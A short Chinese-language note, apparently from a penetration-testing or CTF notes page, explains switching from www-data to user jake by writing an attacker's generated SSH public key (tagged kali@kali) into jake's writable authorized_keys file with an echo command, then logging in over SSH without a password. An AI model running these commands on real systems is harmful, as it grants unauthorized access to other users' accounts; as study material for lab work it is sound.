方法背景:假如以www-data的身份登入,想切换至jake用户,且发现jake的ssh公钥文件可以修改,则此法有效
一般用户的公钥文件是在/home目录下的 例如:
/home/jake/.ssh/authorized_keys
然后可以在本地机上生成当前本地用户的公钥:
ssh-keygen -t rsa
生成后把那一大段的文字复制,导入到目标机的用户公钥里,例如:
AAAAB3NzaC[REDACTED]+m7pk= kali@kali
echo "ssh-rsa AAAAB3NzaC[REDACTED]+m7pk= kali@kali" > /home/jake/.ssh/authorized_keys
最后在本地机上登录即可,无需输入jake的密码:
ssh jake@target_ip
未找到相关的 Issues 进行评论
请联系 @JhinJax-Star 初始化创建